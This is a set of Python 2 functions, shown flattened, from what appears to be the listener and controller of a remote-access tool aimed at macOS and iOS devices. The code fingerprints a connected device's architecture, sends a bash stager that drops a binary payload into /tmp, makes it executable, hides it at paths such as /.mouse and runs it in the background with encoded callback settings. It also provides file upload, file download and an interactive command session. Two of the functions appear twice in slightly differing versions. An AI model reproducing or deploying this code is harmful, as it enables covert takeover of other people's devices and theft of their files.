def set_host_port(self): try: lhost = h.getip() lport = None choice = raw_input(h.info_general_raw("Local Host: ")) if choice != "": lhost = choice while True: lport = raw_input(h.info_general_raw("Local Port: ")) if not lport: lport = 4444 try: lport = int(lport) except ValueError: h.info_error("Invalid port, please enter a valid integer.") continue if lport < 1024: h.info_error("Invalid port, please enter a value >= 1024.") continue break h.info_general("Using " + lhost + ":" + str(lport) + "...") self.host = socket.gethostbyname(lhost) self.port = lport return True except KeyboardInterrupt: return
def upload_file(self, file_path, remote_dir, remote_file_name): term = binascii.hexlify(os.urandom(16)) if os.path.exists(file_path): f = open(file_path, "rb") data = f.read() size = len(data) name = os.path.split(file_path)[-1] cmd_data = json.dumps({ "cmd": "upload", "args": json.dumps({ "size": size, "path": remote_dir, "filename": remote_file_name }), "term": term }) self.sock_send(cmd_data) for i in range((size / 1024) + 1): deltax = i * 1024 chunk = data[deltax:deltax + 1024] self.sock_send(chunk) self.sock_send(term) else: h.info_error("Local file: " + file_path + ": does not exist!")
def download_file(self, path): raw = self.send_command({"cmd": "download", "args": path}) result = json.loads(raw) status = result['status'] if status == 1: if 'size' in result: size = int(result['size']) return self.sock_receive_data(size) elif status == 0: h.info_error("Remote file: " + path + ": does not exist!") elif status == 2: h.info_error("Remote file: " + path + ": does not exist!")
def listen_for_stager(self): #craft shell script identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n' #listen for connection s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', self.port)) s.listen(1) self.verbose_print("Listening on port " + str(self.port) + "...") try: conn, addr = s.accept() except KeyboardInterrupt: s.close() return # identify device hostAddress = addr[0] self.verbose_print("Connecting to " + hostAddress + "...") conn.send(identification_shell_command) device_arch = conn.recv(128).strip() if not device_arch: return # send bash stager try: bash_stager, executable = self.craft_payload(device_arch) except Exception as e: raw_input("Press enter to continue...") return self.verbose_print("Sending Mouse Payload...") self.debug_print(bash_stager.strip()) conn.send(bash_stager) # send executable self.debug_print("Sending Mouse Executable...") conn.send(executable) conn.close() self.verbose_print("Establishing Connection...") try: return self.listen_for_executable_payload(s) except ssl.SSLError as e: h.info_error("SSL error: " + str(e)) return except Exception as e: h.info_error("Error: " + str(e)) return
def interact(self): """Interact with an active session""" readline.clear_history() readline.set_completer(self.tab_complete) readline.parse_and_bind('tab: complete') command_modules = self.server.get_modules(self.type) while 1: try: #prepare command raw = raw_input(self.get_handle()).strip(" ") if not raw or raw.replace(" ", "") == "": continue cmd = raw.split()[0] cmd_data = {"cmd": cmd, "args": raw[len(cmd) + 1:]} if self.needs_refresh: # don't do anything if we are in the middle of updating session pass elif cmd == "exit": self.disconnect(True) return elif cmd == "back" and self.server.is_multi: return elif cmd == "help": self.show_commands() elif cmd in command_modules.keys(): command_modules[cmd].run(self, cmd_data) elif cmd in self.server.modules_local.keys(): self.server.modules_local[cmd].run(self, cmd_data) else: h.info_error("Unrecognized command!") except KeyboardInterrupt: try: print "" if readline.get_line_buffer(): continue except: pass self.disconnect(True) return except Exception as e: print e
def craft_payload(self,device_arch): # TODO: Detect uid before we send executable if not self.host: h.info_error("Local Host is not set") return if not self.port: h.info_error("Local Port is not set") return payload_parameter = h.b64(json.dumps({"ip":self.host,"port":self.port,"debug":self.debug})) if device_arch in self.macos_architectures: self.verbose_print("Detected macOS") f = open("resources/mplmacos", "rb") payload = f.read() f.close() #save to tmp, instructions = \ "cat >/private/tmp/tmpmpl;"+\ "chmod 777 /private/tmp/tmpmpl;"+\ "mv /private/tmp/tmpmpl /private/tmp/mpl;"+\ "/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n" return (instructions,payload) elif device_arch in self.ios_architectures: self.verbose_print("Detected iOS") f = open("resources/mplios", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/tmpmpl;"+\ "chmod 777 /tmp/tmpmpl;"+\ "mv /tmp/tmpmpl /.mpl;"+\ "/.mpl "+payload_parameter+" 2>/dev/null &\n" return (instructions,payload) else: h.info_error("The device is not recognized!") return
def listen_for_stager(self): identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n' s = socket.socket() s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(('0.0.0.0', self.port)) s.listen(1) if self.is_multi == False: h.info_general("Listening On Port --> " + str(self.port) + ".....") try: conn, addr = s.accept() except KeyboardInterrupt: s.close() return hostAddress = addr[0] if self.is_multi == False: h.info_general("Establishing Connection To " + hostAddress) conn.send(identification_shell_command) device_arch = conn.recv(128).strip() if not device_arch: return try: bash_stager, executable = self.craft_payload(device_arch) except Exception as e: h.info_error(str(e)) raw_input("Please Press Enter To Continue Further!") return if self.is_multi == False: h.info_general("Sending Payload...") conn.send(bash_stager) conn.send(executable) conn.close() if self.is_multi == False: h.info_general("Establishing Secure Connection...") try: return self.listen_for_executable_payload(s) except ssl.SSLError as e: h.info_error("SSL error: " + str(e)) return except Exception as e: h.info_error("Error: " + str(e)) return
def craft_payload(self, device_arch): # TODO: Detect uid before we send executable if not self.host: h.info_error("Local Host is not set!") return if not self.port: h.info_error("Local Port is not set!") return payload_parameter = h.b64( json.dumps({ "ip": self.host, "port": self.port, "debug": self.debug })) if device_arch in self.macos_architectures: self.verbose_print("Connecting to macOS...") self.verbose_print("Sending macOS Payload...") f = open("data/payloads/macos", "rb") payload = f.read() f.close() #save to tmp, instructions = \ "cat >/private/tmp/mouse;"+\ "chmod 777 /private/tmp/mouse;"+\ "/private/tmp/mouse "+payload_parameter+" 2>/dev/null &\n" self.verbose_print("Executing macOS Payload...") return (instructions, payload) elif device_arch in self.ios_architectures: self.verbose_print("Connecting to iOS...") self.verbose_print("Sending iOS Payload...") f = open("data/payloads/ios", "rb") payload = f.read() f.close() instructions = \ "cat >/tmp/mouse;"+\ "chmod 777 /tmp/mouse;"+\ "mv /tmp/mouse /.mouse;"+\ "/.mouse "+payload_parameter+" 2>/dev/null &\n" self.verbose_print("Executing iOS Payload...") return (instructions, payload) else: h.info_error("The device is not recognized!") return